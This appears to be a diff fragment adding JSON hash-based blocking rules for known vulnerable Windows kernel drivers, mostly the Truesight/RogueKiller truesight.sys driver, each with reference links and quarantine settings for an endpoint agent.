+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d403298-5d4a-59db-9f21-cca78b2a2c32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827397Z",
+ "creation_date": "2026-03-23T11:45:30.827399Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827405Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a484ffb9ea9148400fab505d1fedddff288cac81a739b93b2d58ea159e20449d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d4dce75-184a-558e-82fd-1b7dd315d7ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977314Z",
+ "creation_date": "2026-03-23T11:45:29.977316Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977321Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1aa8ba45f9524847e2a36c0dc6fd80162923e88dc1be217dde2fb5894c65ff43",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d514121-2000-54a1-94c8-05ec33751eca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144841Z",
+ "creation_date": "2026-03-23T11:45:31.144843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144849Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "227645825c296a3ab08734d67a704b17312d00faf667eea26ee4f89aa32b8545",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d5b0974-848c-5f46-a2ef-b08907062fa7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150738Z",
+ "creation_date": "2026-03-23T11:45:31.150740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d28a1a5e52f83e97e9437116cbecf0be4e650a157e7a6c98e4864ddf0780d40c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d5b8bdc-82c9-59ba-bb0c-09b749627086",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474180Z",
+ "creation_date": "2026-03-23T11:45:31.474183Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "176a8291782aba65d9fd94b4eec5b413d1c47e83c9e2e892742a7105e74e34cb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d5e79db-a1b2-5766-91e0-d741b761d140",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604644Z",
+ "creation_date": "2026-03-23T11:45:29.604646Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604652Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6",
+ "comment": "Vulnerable Kernel Driver (aka mydrivers.sys) [https://www.loldrivers.io/drivers/d9e00cc7-a8f4-4390-a6dc-0f5423e97da4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d5f5b2c-ab51-512e-9578-b3acb90a18cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488045Z",
+ "creation_date": "2026-03-23T11:45:31.488047Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488052Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "528f56c8a2caeee978bf462ae7ada5ecbfa8ca25f7d187fd9c7b660dbd0ca61e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d5fb6ed-fbbe-52aa-a80a-0b00a93d38f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622019Z",
+ "creation_date": "2026-03-23T11:45:29.622021Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26b8e689a13d3434951559cff24fcfe55edeb7b78c7cc16db1a273c90aa694c1",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d60cb57-a381-532c-ae11-ae0166bdf93f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486553Z",
+ "creation_date": "2026-03-23T11:45:31.486556Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a919420de7c56f88fd329ddee21f36945175411028c3a5c392d3b007d62a6c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d640f3e-01eb-5a8d-b0bd-738000942b15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142952Z",
+ "creation_date": "2026-03-23T11:45:31.142954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142960Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a9a0fb0557ba307e5a05efa044f1ab83b349c367ccb0a5449cb5a0a31deaa2fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d6b8e50-a927-50af-a765-f307dcf28c1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833289Z",
+ "creation_date": "2026-03-23T11:45:30.833293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8872bf582c3a4dd9736f52a16764f4de90260eabd0977a36bbd2b9ef735e7b9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d7bf2ff-3570-5108-a6c2-9df6b7d52aa4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497959Z",
+ "creation_date": "2026-03-23T11:45:31.497962Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a285988e4c8281472bc465cc15a1318ac6dc70cb7a58ac0657400d0e5e199db5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d8b233d-a336-5618-8de3-37e652a37793",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483500Z",
+ "creation_date": "2026-03-23T11:45:31.483504Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f74d59e46f8724eb43238e00ee0877b234e22de7a660f2c226d68ce21b663451",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d8ef3cb-ed8a-505d-afca-5cc8e059e556",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462612Z",
+ "creation_date": "2026-03-23T11:45:30.462616Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462625Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bce2afd04ec073143a2a4ba51671992451c8e747a84852458321f2d275b5433",
+ "comment": "Vulnerable Kernel Driver (aka yyprotect64.sys) [https://www.loldrivers.io/drivers/12ccd18a-11da-495a-b4b4-98a2f2bff180/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4d9ed2bc-c7e8-5772-9465-017360104ab9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828387Z",
+ "creation_date": "2026-03-23T11:45:31.828390Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828395Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36f3dcbb114031b79e64f0650570c9248f08ecc000bac6d778f3df8cfdc7fc3d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4da00d52-f840-562e-9110-0aeca3bda106",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143729Z",
+ "creation_date": "2026-03-23T11:45:31.143731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98576e60b9821f44004c5b6856c75c80607fd7cb42768dd133d192846e6d9c13",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4da6ec80-5183-5988-affc-28ac774fa1c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829916Z",
+ "creation_date": "2026-03-23T11:45:30.829918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829924Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19efc37343ea49027413e197762220cdccb73103b08653b049ae9c0bf9d3cf01",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4db3007d-e59d-5f0f-8b73-f9de3d89e13d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156274Z",
+ "creation_date": "2026-03-23T11:45:31.156276Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156281Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c92ddd3bd10344acda9a901384a86597cac3d1db8487b913574768a17dd9e8ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4db5b4de-3346-586d-83c8-30219a628cec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817373Z",
+ "creation_date": "2026-03-23T11:45:31.817375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b730f859033c3693864b75c93b57cbccb91d2438813ecd7ef535b9cb3b6dbcc9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4db6d26f-7642-5a7d-a433-68a3e667b928",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973182Z",
+ "creation_date": "2026-03-23T11:45:29.973184Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973189Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e35d09a903d76810830aff2fc87bb3071026d982a334b3ee4c68f66cba865109",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4db76a93-28cd-5834-9ba2-dc6046084b27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620513Z",
+ "creation_date": "2026-03-23T11:45:29.620515Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620521Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4deaa4a7-0799-53a1-9616-db1afe385fb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475476Z",
+ "creation_date": "2026-03-23T11:45:31.475480Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cffe0eaa5a3dc73494239a44041bfe804bc2756f5f6466fb55d23fb79cdc8e37",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
